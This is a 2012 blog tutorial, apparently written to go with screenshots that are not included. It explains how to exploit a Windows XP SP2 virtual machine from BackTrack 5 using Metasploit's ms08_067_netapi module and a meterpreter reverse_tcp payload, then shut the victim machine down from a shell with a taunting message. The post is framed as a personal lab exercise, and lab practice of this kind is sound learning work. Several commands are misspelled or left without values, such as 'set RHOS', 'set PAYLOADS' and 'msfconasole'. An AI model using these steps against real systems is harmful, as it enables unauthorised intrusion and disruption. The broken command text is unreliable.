Thursday, March 29, 2012

exploit windows xp with backtrack 5 in virtual machine person

to day i will posting about how to exploit windows xp 2 with backtrack 5 in virtual machine,
ok first you have to install backtrack 5, and install virtualbox in your back track 5, and in the virtualbox you install windows xp 2 for victims in your experiment, ok look the pictures, and i will try to explain that i know how basic from exploit win xp 2, in your laboratorium personal, ok follow this pictures,

Open your virtualbox and Open or start your win xp to be a victims, fom your exploit.

Ok, pictures in under your win xp already to acces,
And then open your console and type msfconasole and witting  until show the pictures that signal to beginning exploit that. like this pictures.

if you finish to waiting you will look like this in under pictures.

and then you have to type use exploit/windows/smb/ms08_067_netapi and click enter. type show options, and then type set RHOS your ip target my ip target is soo i have to type
set RHOS enter, you will see like this under pictures.

and then type show option to make sure that you set is RHOS not other.
next you type show payloads and you will look many some payloads, and the you have to type
commands set PAYLOADS windows/meterppreter/reverse_tcp and enter. you will looks, like this under captures, and then type show option, you will looks, who you will to take or set the LHOS or your ip adresss in vmnet0,

if you success until this step,
you ready to looks specific target you have to type show target , and you can set target may target spesific is number 3 so i have to type set TARGET 3 , in this step you can to not input or to set target, no ok,
and then type exploit and if you success you will come in the system from window xp target, you can doing anything in the victim in exemple i will shutdown the victims,

ok type shell and you will come in the system type cd .. untill in system c:\ and then type shutdown -s -t 07 -c "i kill you victims" try guest to known what happen about that thanks.

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